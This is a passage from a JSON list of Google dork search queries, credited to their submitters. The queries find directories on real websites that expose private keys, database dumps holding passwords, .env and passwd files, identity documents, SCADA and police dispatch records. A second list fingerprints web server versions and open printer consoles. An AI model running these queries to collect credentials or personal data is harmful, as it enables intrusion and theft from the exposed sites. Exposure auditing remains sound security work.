"inurl:admin/data* intext:index of", "description": "*GOOGLE DORK : inurl:admin/data* intext:index of*\r\n\r\n*AUTHOR : ANJALI PRAKASH*"}, {"dork": "inurl:_vti_pvt/service.pwd", "description": "# Google Dork: inurl:_vti_pvt/service.pwd\r\n# Juicy information and sensitive directories including passwords.\r\n# Date: 17/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"oauth-private.key\"", "description": "# Dork:intitle:\"index of\" \"oauth-private.key\"\r\n# Oauth Private Keys\r\n# Author: Ambadi MP"}, {"dork": "inurl:member filetype:xls", "description": "Dork:- inurl:member filetype:xls\r\nDescription:- This dork can find Excel spreadsheets in an members\r\ndirectory. Many times these documents contain sensitive information.\r\n\r\nAuthor : GAGAN KUMAR JHA\r\nDATE: 18/06/2020\r\nLinkedin: https://www.linkedin.com/in/gagan-kumar-jha55/"}, {"dork": "Index of: /services/pancard/", "description": "# Google dork: Index of: /services/pancard/\r\n# Exploit Author: Harsh Wadhwani\r\n# Description: The dork list out Personally identifiable information on a\r\n# website (Sensitive information)\r\n\r\nRegards"}, {"dork": "intitle:\"index of\" \"ssh_host_ecdsa_key\"", "description": "# Dork : intitle:\"index of\" \"ssh_host_ecdsa_key\"\r\n# Sensitive Directory contains Private keys\r\n# Author : Ambadi MP"}, {"dork": "Google Dork : Index of: /services/aadhar card/", "description": "Google Dork : Index of: /services/aadhar card/\r\nThis google dork will list a personal identification.\r\n(Sensitive Information)\r\n#Author : Pratik Khalane\r\n# Date : 27/06/2020"}, {"dork": "intitle:\"index of\" \"app.log\"", "description": "# Dork : intitle:\"index of\" \"app.log\"\r\n# Sensitive Informations\r\n# Author : Ambadi MP"}, {"dork": "\"Index of\" \"/monitoring\"", "description": "Google Dork: \"Index of\" \"/monitoring\"\r\nCategory: Files containing Juicy Information\r\n\r\nLet me know, how shall we proceed further.\r\n\r\nKind Regards,\r\nPawan Chhabria"}, {"dork": "intitle:\"index of\" \"/home/ROOT_PATH/\"", "description": "# Google Dork: intitle:\"index of\" \"/home/ROOT_PATH/\"\r\n# Sensitive directories.\r\n# Date: 29/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of c:xampp\"", "description": "intitle:\"Index of c:\\xampp\"\r\nCategory: Sensitive Directory\r\nSummary: A Google dork that gives information about the Sensitive Directory."}, {"dork": "intitle:\"index of\" \"/root/etc/security/\"", "description": "# Google Dork: intitle:\"index of\" \"/root/etc/security/\"\r\n# Juicy information and sensitive directories.\r\n# Date: 8/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of /\" +.htaccess.old", "description": "Description: intitle:\"Index of /\" +.htaccess.old\r\nAccess to the parent directory and more"}, {"dork": "intitle:\"index of\" /var/logs filetype:'\"log | txt | csv\"", "description": "*Google Dork:* intitle:\"index of\" /var/logs filetype:'\"log | txt | csv\"\r\n\r\nDescription:-\r\nDiscovers log files stored on linux servers in open directories of websites.\r\nSensitive information is exposed on the site.\r\n\r\nDate:- 21st July, 2020\r\nExploit Author:- Siddharth Hingol\r\n\r\nThanks & Regards,\r\nSiddharth Hingol"}, {"dork": "Index: /wp-includes/Text/Diff", "description": "Google Dork : Index: /wp-includes/Text/Diff\r\n\r\nDescription: This dork will help to find sensitive directories.\r\n(Sensitive Data)\r\n\r\nAuthor : Pratik Khalane\r\n\r\nDate: 18/07/2020"}, {"dork": "intitle:\"index of\" /lsass.exe", "description": "Dorks:\r\nintitle:\"index of\" /lsass.exe\r\n\r\nSummary:\r\nA Google dork that gives Sensitive information about the lsass.exe\r\ninformation.\r\n-- \r\nThanks & Regards,\r\nPrasad Lingamaiah"}, {"dork": "\"Share Link\" inurl:/share.cgi?ssid=", "description": "# Google Dork: \"Share Link\" inurl:/share.cgi?ssid=\r\n\r\n# myQnap cloud servers files and folder shared.\r\n\r\n# Date: 27/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/000~ROOT~000/\"", "description": "# Google Dork: intitle:\"index of\" \"/000~ROOT~000/\"\r\n# Juicy and sensitive information under Root directory.\r\n# Date: 29/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"firewall.log\" | \"firewall.logs\"", "description": "# Google Dork: intitle:\"index of\" \"firewall.log\" | \"firewall.logs\"\r\n# Juicy info and sensitive directories.\r\n# Date: 10/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-- Dump completed\" ext:sql | ext:txt | ext:log", "description": "# Google Dork: \"-- Dump completed\" ext:sql | ext:txt | ext:log\r\n# Sensitive directories.\r\n# Date: 29/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"ws_ftp.log\" ext:log", "description": "# Google Dork: \"ws_ftp.log\" ext:log\r\n# Sensitive directories.\r\n# Date: 1/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-- PostgreSQL database dump complete\" ext:sql | ext:txt | ext:log | ext:env", "description": "# Google Dork: \"-- PostgreSQL database dump complete\" ext:sql | ext:txt | ext:log | ext:env\r\n# Sensitive directories.\r\n# Date: 15/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"index of\" \"users.ibd\"", "description": "# Google Dork: \"index of\" \"users.ibd\"\r\n# Description :- Disclosure of database file tables and sensitive files.\r\n# Date: 13/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "\"index of\" \"performance_schema\"", "description": "# Google Dork: \"index of\" \"performance_schema\"\r\n# Description :- Disclosure of sensitive files.\r\n# Date: 17/09/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "ext:reg [HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSshHostKeys]", "description": "# Google Dork: ext:reg [HKEY_CURRENT_USER\\Software\\SimonTatham\\PuTTY\\SshHostKeys]\r\n# This search locates private SSHHostkeys.\r\n# Date: 18/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "GitLab ssh.log ext:log", "description": "# Google Dork: GitLab ssh.log ext:log\r\n# Author: Muralikrishna Janga\r\n# Category: Sensitive Directories\r\n\r\n# About the Dork: Dork would help to find GitLab logs and sensitive\r\ndirectories"}, {"dork": "\"-- Dumping data for table `users` | `people` | `member`\" ext:sql | ext:txt | ext:log | ext:env", "description": "# Google Dork:\"-- Dumping data for table `users` | `people` | `member`\"\r\next:sql | ext:txt | ext:log | ext:env\r\n\r\n# Sensitive directories including usernames, passwords and more.\r\n# Date: 23/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-- Dumping data for table * \" ext:sql | ext:xls intext:db | intext:database | intext:password | username", "description": "# Dork: \"-- Dumping data for table * \" ext:sql | ext:xls intext:db | intext:database | intext:password | username\r\nThis dork is helping in finding sensitive directories that includes\r\nusernames and passwords of all tables present in any database.\r\n\r\nThank you"}, {"dork": "intitle:\"index of\" \"/app.log\" | \"/app.logs\"", "description": "# Google Dork: intitle:\"index of\" \"/app.log\" | \"/app.logs\"\r\n# Sensitive Directories.\r\n# Date: 24/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"index of\" \"email.ini\"", "description": "Google Dork: \"index of\" \"email.ini\"\r\nDescription : Disclosure of database file tables and sensitive files.\r\nDate : 26/09/2020\r\nAuthor: Aninda Saha"}, {"dork": "intitle:\"Everything\" inurl:C:Windows", "description": "# Dork: intitle:\"Everything\" inurl:C:\\Windows\r\n# Sensitive directories"}, {"dork": "intitle:\"index of\" \"/system.log\" | \"/system.logs\"", "description": "# Google Dork: intitle:\"index of\" \"/system.log\" | \"/system.logs\"\r\n\r\n# Sensitive directories with juicy info.\r\n\r\n# Date: 2/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"slapd.conf\"", "description": "# Google Dork: intitle:\"index of\" \"slapd.conf\"\r\n\r\n# Sensitive directories containing passwords and more...\r\n\r\n# Date: 5/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"index of\" \"mysql.sh\"", "description": "# Title: Sensitive Data Exposure\r\n# Google Dork: \"index of\" \"mysql.sh\"\r\n# Date: 2020-09-14\r\n\r\n# Author: Virendra Tiwari\r\n# LinkedIn: https://www.linkedin.com/in/virendratiwari/"}, {"dork": "intitle:\"index of\" \"/CFIDE/\" intext:\"administrator\"", "description": "# Google Dork: intitle:\"index of\" \"/CFIDE/\" intext:\"administrator\"\r\n# Sensitive directories.\r\n# Date: 8/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle: \"Index of\" inurl:admin/uploads", "description": "# Google Dork: intitle: \"Index of\" inurl:admin/uploads\r\n\r\n# Sensitive upload contents from Websites.\r\n\r\n# Author:SARATH G"}, {"dork": "intitle:\"index of\" \"server.crt\" | \"server.csr\"", "description": "# Google Dork: intitle:\"index of\" \"server.crt\" | \"server.csr\"\r\n\r\n# Certificates and private keys...\r\n\r\n# Date: 13/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:node_modules/mqtt/test/helpers/", "description": "Author: Rahul Parmar\r\nGoogle Dork : inurl:node_modules/mqtt/test/helpers/\r\nDate: 15-Oct-2020\r\nExpose Private key"}, {"dork": "inurl:8080 + intext:\"httpfileserver 2.3\"", "description": "# Google Dork: inurl:8080 + intext:\"httpfileserver 2.3\"\r\n\r\n# Sensitive directories.\r\n\r\n# Date: 20/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl: /.git", "description": "# DorK: inurl: /.git\r\n# Author Name: Tuhin Bose\r\n\r\nDescription: Contains sensitive info about github repos."}, {"dork": "intitle:\"index of\" \"WebServers.xml\"", "description": "# Google Dork: intitle:\"index of\" \"WebServers.xml\"\r\n# Sensitive directories.\r\n# Date: 3/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-- Dumping data for table `admin`\" | \"-- INSERT INTO `admin`\" \"VALUES\" ext:sql | ext:txt | ext:log | ext:env", "description": "# Google Dork: \"-- Dumping data for table `admin`\" | \"-- INSERT INTO `admin`\" \"VALUES\" ext:sql | ext:txt | ext:log | ext:env\r\n# Sensitive directories containing many times admin usernames and passwords.\r\n# Date: 3/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:index of .git/hooks/", "description": "Dorks: intitle:index of .git/hooks/\r\nCategory: Sensitive Information\r\nSummary: Contains sensitive info about the Github repository."}, {"dork": "intitle:\"index of\" \"*.cert.pem\" | \"*.key.pem\"", "description": "# Google Dork: intitle:\"index of\" \"*.cert.pem\" | \"*.key.pem\"\r\n# Sensitive directories containing Private Keys and more...\r\n# Date: 9/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ssh_host_dsa_key.pub + ssh_host_key + ssh_config = \"index of / \"", "description": "#Google dork: ssh_host_dsa_key.pub + ssh_host_key + ssh_config = \"index of/ \"\r\n#Catregory: Sensitive directories\r\n#Expoit Author: Abishekraghav Murugeashan\r\n#linkedIn: https://www.linkedin.com/in/arhaxor21/"}, {"dork": "\"index of\" inurl:database ext:sql | xls | xml | json | csv", "description": "# Title: Sensitive Data Exposure\r\n# Google Dork: \"index of\" inurl:database ext:sql | xls | xml | json | csv\r\n# Date: 2020-11-10\r\n\r\n# Author: Yogender Singh\r\n# LinkedIn: https://www.linkedin.com/in/imyoge10/\r\n\r\nRegards\r\nYogender Singh"}, {"dork": "intitle:\"index of\" \"dump.sql\"", "description": "# Google Dork: intitle:\"index of\" \"dump.sql\"\r\n# Sensitive directories that reveal total info about the database tables, users, passwords..etc\r\n# Date: 20/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" inurl:admin/download", "description": "# Google Dork: intitle:\"index of\" inurl:admin/download\r\n# Sensitive Directories\r\n# Date: 23/11/2020\r\n# Exploit Author: Ayd\u0131n Baran Ertemir"}, {"dork": "/etc/certs + \"index of /\" */*", "description": "#Google dork: /etc/certs + \"index of /\" */*\r\n\r\n#Catregory: Sensitive directories\r\n\r\n#Expoit Author: Abishekraghav Murugeashan\r\n\r\n#linkedIn: https://www.linkedin.com/in/arhaxor21/"}, {"dork": "/etc/config + \"index of /\" /", "description": "# Google Dork: \"/etc/config + \"index of /\" */*\"\r\n\r\n# Title: Sensitive file disclosure\r\n\r\n# Date: 04/12/2020\r\n# Author: Manish Solanki\r\n\r\n# LinkedIn: https://www.linkedin.com/company/thehacktivists/\r\n\r\n# Bugcrowd: https://bugcrowd.com/ethicalhaxter"}, {"dork": "\"-- Dumped from database version\" + \"-- Dumped by pg_dump version\" ext:txt | ext:sql | ext:env | ext:log", "description": "# Google Dork: \"-- Dumped from database version\" + \"-- Dumped by pg_dump version\" ext:txt | ext:sql | ext:env | ext:log\r\n# Sensitive directories.\r\n# Date: 12/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:(\"Index of\" AND \"wp-content/plugins/boldgrid-backup/=\")", "description": "# Google Dork: intitle:(\"Index of\" AND \"wp-content/plugins/boldgrid-backup/=\")\r\n# Sensitive directories.\r\n# Date: 15/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"*Maildir/new\"", "description": "# Google Dork: intitle:\"index of\" \"*Maildir/new\"\r\n# Sensitive directories where many email directories and emails can be found...\r\n# Date: 16/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/jsps/testoperation.jsp \"Test Operation\"", "description": "# Google Dork: inurl:/jsps/testoperation.jsp \"Test Operation\"\r\n\r\n# Sensitive directories.\r\n\r\n# Date: 11/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/certs/server.key", "description": "Google Dork: inurl:/certs/server.key\r\n\r\nThis will expose the Private RSA Key.\r\n(Sensitive Data Exposure)\r\n\r\nAuthor : Pratik Khalane\r\n\r\nDate: 01/02/2021"}, {"dork": "inurl:print.htm intext:\"Domain Name:\" + \"Open printable report\"", "description": "# Google Dork: inurl:print.htm intext:\"Domain Name:\" + \"Open printable report\"\r\n\r\n# Sensitive directories.\r\n\r\n# Date: 27/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:tcpconfig.html", "description": "Dorks: inurl:tcpconfig.html\r\n\r\nCategory: Various Online Devices\r\n\r\nSummary:\r\nA Google dork that gives the online Device information."}, {"dork": "\"-----BEGIN PGP PRIVATE KEY BLOCK-----\" ext:pem | ext:key | ext:txt -git", "description": "# Google Dork: \"-----BEGIN PGP PRIVATE KEY BLOCK-----\" ext:pem | ext:key | ext:txt -git\r\n# Sensitive directories.\r\n# Date: 9/2/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-----BEGIN EC PRIVATE KEY-----\" | \" -----BEGIN EC PARAMETERS-----\" ext:pem | ext:key | ext:txt", "description": "# Google Dork: \"-----BEGIN EC PRIVATE KEY-----\" | \" -----BEGIN EC PARAMETERS-----\" ext:pem | ext:key | ext:txt\r\n# Sensitive directories.\r\n# Date: 9/2/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/wp-content/uploads/wp-file-manager-pro", "description": "Description : inurl:/wp-content/uploads/wp-file-manager-pro\r\n\r\nThis google dork gives us the Sensitive Directories details of\r\nmisconfigured servers."}, {"dork": "inurl:wp-content/uploads/ intitle:logs", "description": "Description: inurl:wp-content/uploads/ intitle:logs \r\n\r\nThis google dork gives us the Sensitive Directories details of misconfigured servers."}, {"dork": "inurl:/wp-content/uploads/wp-file-manager-pro/fm_backup", "description": "# Google Dork: inurl:/wp-content/uploads/wp-file-manager-pro/fm_backup\r\n# Sensitive Directories\r\n# Date: 18/04/2021\r\n# Exploit Author: Aftab Alam"}, {"dork": "intitle:\"index of\" intext:\"client.key.pem\"", "description": "# Dork: *intitle:\"index of\" intext:\"client.key.pem\"*\r\n\r\nThis google dork gives us access to sensitive data stored on servers, such\r\nas private client and server keys.\r\n\r\nThank you,\r\nKetki Davda"}, {"dork": "intitle:\"index of\" \"/.vscode\"", "description": "# Dork: intitle:\"index of\" \"/.vscode\"\r\n# Finding directories with sensitive information\r\n\r\n-- \r\nRegards,\r\n\r\n*Hilary Soita.*"}, {"dork": "intext:\"CAD Media Log\"", "description": "# Google Dork: intext:\"CAD Media Log\"\r\n# Date: 2021-05-20\r\n# Author: Issac Briones\r\n\r\n# This dork reveals online records for computer aided dispatch systems used by police."}, {"dork": "intitle:\"index of\" \"/configs\"", "description": "# Google Dork: intitle:\"index of\" \"/configs\"\r\n\r\n# Sensitive directories containing many times usernames, passwords and\r\nother juicy information like emails, IPs, hostnames and more...\r\n\r\n# Date: 29/06/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:filemanager/upload/asp/ \"index of\"", "description": "# Google Dork: inurl:filemanager/upload/asp/ \"index of\"\r\n# Category: Sensitive Directories\r\n# Date: 03/07/2021\r\n# Exploit Author: s Thakur"}, {"dork": "intitle:\"index of\" \"contacts.vcf\"", "description": "# Google Dork: intitle:\"index of\" \"contacts.vcf\"\r\n# Sensitive Directories\r\n# Date: 19/08/2021 \r\n# Exploit Author: Hilary Soita"}, {"dork": "intitle:index.of (inurl:admin | intitle:admin)", "description": "# Google Dork: intitle:index.of (inurl:admin | intitle:admin)\r\n# Pages Containing Login Portals\r\n# Date: 16/08/2021 \r\n# Exploit Author: Saurabh Gupta"}, {"dork": "intitle: \"Index of\" inurl:fileadmin", "description": "#Google Dork : intitle: \"Index of\" inurl:fileadmin\r\n# Sensitive Directories\r\n#Date: 10/07/2021\r\n#Exploit Author : Tanvir Imon"}, {"dork": "intitle:\"index of\" \"private/log\"", "description": "# Google Dork: intitle:\"index of\" \"private/log\"\r\n# Sensitive Directories\r\n# Date: 08/07/2021 \r\n# Exploit Author: Rahul Kumar"}, {"dork": "Google Dork: intitle: \"index of\" \"payment\"", "description": "# Google Dork: intitle: \"index of\" \"payment\"\r\n# Sensitive Directories\r\n# Date:21/09/2021\r\n# Exploit Author: Bon Sai"}, {"dork": "intitle:\"index of SCADA\"", "description": "# Google Dork: intitle:\"index of SCADA\"\r\n# Sensitive Directories\r\n# Date: 01/10/2021 \r\n# Exploit Author: Romell Marin Cordoba"}, {"dork": "intitle: \"index of backup.php\"", "description": "# Google Dork: intitle: \"index of backup.php\"\r\n# Sensitive Directories\r\n# Date:06/10/2021\r\n# Exploit Author: Naman Shah"}, {"dork": "intitle: \"index of backup.xml\"", "description": "# Google Dork: intitle: \"index of backup.xml\"\r\n# Sensitive Directories\r\n# Date: 06/10/2021 \r\n# Exploit Author: Naman Shah"}, {"dork": "intitle:\" index of \"/Invoices*\"", "description": "# Google Dork: intitle:\" index of \"/Invoices*\"\r\n# Sensitive Directories\r\n# Date:09/10/2021\r\n# Exploit Author: AFFAN AHMED"}, {"dork": "intitle:\"index of\" \".env\"", "description": "# Google Dork: intitle:\"index of\" \".env\"\r\n# Sensitive Directories\r\n# Date: 29/10/2021 \r\n# Exploit Author: Chinmay Divekar"}, {"dork": "intitle:\"index of /\" \"sqlite.db\"", "description": "# Google Dork: intitle:\"index of /\" \"sqlite.db\"\r\n# Sensitive Directories\r\n# Date: 02/12/2021\r\n# Exploit Author: Luc Moreau"}, {"dork": "site:com intitle:index of ..................etcpasswd", "description": "This google dork gives us *passwd files* in *.com* top level domains .\r\n*/etc/passwd* file contains files list of users in Linux\r\n\r\n\r\nRegards,\r\n*Supriyo Guha*"}, {"dork": "intitle:Index of \"pyvenv.cfg\"", "description": "# Google Dork: intitle:Index of \"pyvenv.cfg\"\r\n# Sensitive Directories\r\n# Date: 07/02/2022\r\n# Exploit Author: Devanshi Gajjar"}, {"dork": "intitle:Index of \"/venv\"", "description": "# Google Dork: intitle:Index of \"/venv\"\r\n# Sensitive Directories\r\n# Date: 08/09/2022 \r\n# Exploit Author: Abhishek Singh"}, {"dork": "intitle:\"index of\" database.properties", "description": "# Google Dork: intitle:\"index of\" database.properties\r\n# Description:- This page contains various database.properties of spring\r\nMVC,\r\n# Author: Odela Rohith\r\n# Date: 28-DEC-2023\r\n# Linkedin: https://www.linkedin.com/in/odela-rohith-b723a7122/\r\n# Facebook: https://www.facebook.com/odela.rohith.7\r\n\r\nRegards,\r\nOdela Rohith"}, {"dork": "intitle: index of /concrete/Password", "description": "Description-* intitle: index of /concrete/Password*\r\nThis google dork searches in the title of websites for the index of\r\n/concrete/Password"}], "Web Server Detection": [{"dork": "\"Novell, Inc\" WEBACCESS Username Password \"Version *.*\" Copyright -inurl:help -guides|guide", "description": "This may be used to find Novell Grouwise Webaccess servers."}, {"dork": "intext:\"404 Object Not Found\" Microsoft-IIS/5.0", "description": "This search finds IIS 5.0 error pages = IIS 5.0 Server"}, {"dork": "intitle:\"Object not found\" netware \"apache 1..\"", "description": "This search will show netware apache webservers as the result."}, {"dork": "intitle:\"Object not found!\" intext:\"Apache/2.0.* (Linux/SuSE)\"", "description": "This one detects apache werbservers (2.0.X/SuSE) with its error page."}, {"dork": "intitle:\"Welcome to Your New Home Page!\" \"by the Debian release\"", "description": "This finds the default Apache page on Debian installs."}, {"dork": "(inurl:81-cobalt | inurl:cgi-bin/.cobalt)", "description": "Cobal RaQ internal pages"}, {"dork": "intitle:\"Test Page for the Apache HTTP Server on Fedora Core\" intext:\"Fedora Core Test Page\"", "description": "Apache 2.0 on Fedore Core Test page"}, {"dork": "intitle:\"Welcome to Windows Small Business Server 2003\"", "description": "Another way to find Small Business Server 2003, for more results check the dork by JimmyNeutron (id=763)."}, {"dork": "intitle:\"Welcome To Your WebSTAR Home Page\"", "description": "This is the default page for the WebSTAR (Macintosh) web server (Headers say --> Server: WebSTAR NetCloak)."}, {"dork": "intitle:\"Document title goes here\" intitle:\"used by web search tools\" \" example of a simple Home Page\"", "description": "IBM Http Server (AS/400)"}, {"dork": "intitle:\"Welcome to 602LAN SUITE *\"", "description": "The 602LAN SUITE runs on a webserver called WEB602/1.04 and includes webmail."}, {"dork": "(intitle:\"502 Proxy Error\")|(intitle:\"503 Proxy Error\") \"The proxy server could not handle the request\" -topic -mail -4suite -list -site:geocrawler.co", "description": "A reverse proxy is a gateway for servers, and enables one web server to provide content from another transparently. These are often implemented to improve security or performance."}, {"dork": "inurl:nnls_brand.html OR inurl:nnls_nav.html", "description": "Novell Nterprise Linux Services detection dork. Some of the features are:* iFolder* Samba* NetStorage* eDirectory Administration* Linux User Management* NMAS 2.3* NetMail 3.5* GroupWise 6.5* iPrint* Virtual Office"}, {"dork": "intitle:\"Apache Status\" \"Apache Server Status for\"", "description": "New Apache Server Status Dork"}, {"dork": "intitle:\"BadBlue: the file-sharing web server anyone can use\"", "description": "Badblue file sharing web server detection"}, {"dork": "intitle:\"Welcome to IIS 4.0\"", "description": "Moving from personal, lightweight web servers into more production-ready software, we find that even administrators of Microsoft's Internet Information Server (IIS) sometimes don't have a clue what they're doing. By searching on web pages with titles of \"Welcome to IIS 4.0\" we find that even if they've taken the time to change their main page, some dorks forget to change the titles of their default-installed web pages. This is an indicator that their web server is most likely running, or was upgraded from, the now considered OLD IIS 4.0 and that at least portions of their main pages are still exactly the same as they were out of the box. Conclusion? The rest of the factory-installed stuff is most likely lingering around on these servers as well. Old code: FREE with operating system.Poor content management: an average of $40/hour. Factory-installed default scripts: FREE with operating system.Getting hacked by a script kiddie that found you on Google: PRICELESS.For all the things money can't buy, there's a googleDork award."}, {"dork": "\"powered by openbsd\" +\"powered by apache\"", "description": "I like the OpenBSD operating system. I really do. And I like the Apache web server software. Honestly. I admire the mettle of administrators who take the time to run quality, secure software. The problem is that you never know when security problems will pop up. A BIG security problem popped up within the OpenBSD/Apache combo back in the day.Now, every administrator that advertised this particular combo with cute little banners has a problem. Hackers can find them with Google. I go easy on these folks since the odds are they.ve patched their sites already. Then again, they may just show up on zone-h.."}, {"dork": "filetype:asmx inurl:(_vti_bin|api|webservice)", "description": "this dork will return web service ."}, {"dork": "inurl:\"/web-console/\" intitle:\"Administration Console\"", "description": "JBoss Application Server Info\n-Xploit"}, {"dork": "intext:Apache/2.2.29 (Unix) mod_ssl/2.2.29 | intitle:\"Index of /\"", "description": "Server Name and Port.\n-Xploit"}, {"dork": "intitle:\"Index of /\" \"Proudly Served by Surftown at\"", "description": "Finds Surftown HTTP servers\nDxtroyer"}, {"dork": "intitle:\"Index of\" \"Apache/2.4.7 (Ubuntu) Server\"", "description": "Dork: intitle:\"Index of\" \"Apache/2.4.7 (Ubuntu) Server\"\nDesc: This dork is used to find Ubuntu servers and a certain version of\nApache. Modify it to find the servers you need."}, {"dork": "inurl:readme.rst intext:\"CodeIgniter\"", "description": "Google Search:inurl:readme.rst intext:\"CodeIgniter\"\nExplanation: CodeIgniter comes with a default offline readme.rst which\nmost of the installed applications don't remove and gets indexed. Its can\nable to identify the framework and exploit it.\n*Vishnu Prasad P G*"}, {"dork": "intext:\"Welcome to CodeIgniter!\"", "description": "Google dork which helps to identify CodeIgniter applications\n- Anand"}, {"dork": "intitle:\"Welcome to Windows 2000 Internet Services\"", "description": "At first glance, this search reveals even more examples of operating system users enabling the operating system default web server software. This is generally accepted to be a Bad Idea(TM) as mentioned in the previous example. However, the googleDork index on this particular category gets quite a boost from the fact that this particular screen should NEVER be seen by the general public. To quote the default index screen: \"Any users attempting to connect to this site are currently receiving an 'Under Construction page'\" THIS is not the 'Under Construction page.' I was only able to generate this screen while sitting at the console of the server. The fact that this screen is revealed to the general public may indicate a misconfiguration of a much more insidious nature..."}, {"dork": "intitle:\"Apache HTTP Server\" intitle:\"documentation\"", "description": "When you install the Apache web server, you get a nice set of online documentation. When you learn how to use Apache, your supposed to delete these online Apache manuals. These sites didn't. If they're in such a hurry with Apache installs, I wonder what else they rushed through?"}, {"dork": "inurl:tech-support inurl:show Cisco", "description": "This is a way to find Cisco products with an open web interface. These are generally supposed to be user and password protected. Google finds ones that aren't. Be sure to use Google's cache if you have trouble connecting. Also, there are very few results (2 at the time of posting.)"}, {"dork": "i_index.shtml Ready", "description": "These printers are not-only web-enabled, but their management interface somehow got crawled by google! These puppies should not be public! You can really muck with these printers. In some cases, going to the \"password.shtml\" page, you can even lock out the admins if a username and password has not already been set! Thanks to mephisteau@yahoo.co.uk for the idea =)"}, {"dork": "aboutprinter.shtml", "description": "More Xerox printers on the web! Google found these printers. Should their management interface be open to the WHOLE INTERNET? I think not."}, {"dork": "\"seeing this instead\" intitle:\"test page for apache\"", "description": "This is the default web page for Apache 1.3.11 - 1.3.26. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."}, {"dork": "intitle:\"Test Page for Apache\" \"It Worked!\"", "description": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."}, {"dork": "intitle:\"Test Page for Apache\" \"It Worked!\" \"on this web\"", "description": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."}, {"dork": "allintitle:Netscape FastTrack Server Home Page", "description": "This finds default installations of Netscape Fasttrack Server. In many cases, default installations can be insecure especially considering that the administrator hasn't gotten past the first few installation steps."}, {"dork": "intitle:\"Test Page for Apache\"", "description": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained."}, {"dork": "intitle:Snap.Server inurl:Func=", "description": "This page reveals the existance of a SNAP server (Netowrk attached server or NAS devices) Depending on the configuration, these servers may be vulnerable, but regardless the existance of this server is useful for information gathering."}, {"dork": "intitle:\"300 multiple choices\"", "description": "This search shows sites that have the 300 error code, but also reveal a server tag at the bottom of the page that an attacker could use to profile a system."}, {"dork": "inurl:domcfg.nsf", "description": "This will return a listing of servers running Lotus Domino. These servers by default have very descriptive error messages which can be used to obtain path and OS information. In addition, adding \"Login Form Mapping\" to the search will allow you to see detailed information about a few of the servers that have this option enabled."}, {"dork": "allinurl:\".nsconfig\" -sample -howto -tutorial", "description": "Access to a Web server's content, CGI scripts, and configuration files is controlled by entries in an access file. On Apache and NCSA Web servers the file is .htaccess, on Netscape servers it is .nsconfig.These files associate users, groups, and IP addresses with various levels of permissions: GET (read), POST (execute), PUT (write), and DELETE. For example, a FrontPage author would have permission to use HTTP POST commands (to save new content), and a user with browse permissions would be permitted to use HTTP GET commands (to read content)."}, {"dork": "HTTP_USER_AGENT=Googlebot", "description": "This is a generic way of grabbing those CGI-spewed environmental var lists. To narrow to things down, an attacker could use any of the following: SERVER_SIGNATURE, SERVER_SOFTWARE, TNS_ADMIN, DOCUMENT_ROOT, etc."}, {"dork": "intitle:\"Page rev */*/*\" inurl:\"admin", "description": "Red Hat UNIX Administration Pages. This search detects the fixed title for the admin pages on certain Red Hat servers. A login is required to access them, but an attacker could use this search to determine the operating system used by the server."}, {"dork": "\"AnWeb/1.42h\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"CERN httpd 3.0B (VAX VMS)\"", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"JRun Web Server\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an 